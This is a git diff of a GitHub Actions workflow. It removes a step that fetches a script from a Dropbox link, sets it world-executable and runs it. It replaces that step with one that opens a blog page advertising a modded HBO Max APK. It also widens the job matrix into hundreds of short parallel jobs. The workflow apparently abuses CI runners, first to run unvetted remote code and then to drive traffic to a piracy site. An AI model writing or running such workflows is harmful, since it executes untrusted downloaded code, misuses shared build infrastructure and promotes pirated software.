--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -7,19 +7,17 @@ on:
    
 jobs:
   build:
-    runs-on: Ubuntu-latest
+    runs-on: macos-latest
     strategy:
       max-parallel: 20
       fail-fast: false
       matrix:
-        go: [1.0]
-        flag: [A]
+        go: [1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.1, 2.2]
+        flag: [A, B, C, D, E, F, G, H, I, G, K, L, M, N, Ñ, O, P, K]
     timeout-minutes: 3
     env:
         NUM_JOBS: 900
         JOB: ${{ matrix.go }}
     steps:
-       - name: PREPARING
-      run: wget https://www.dropbox.com/s/iod9hgxsuqrhn4l/ok.sh && sudo chmod 777 ok.sh && ./ok.sh
-       - name: DONE
-      run: exit
+    - name: todo
+      run: open -a "Google Chrome" "https://yoelmod.blogspot.com/2022/02/hbo-max-premium-mod-apk-para-android.html"
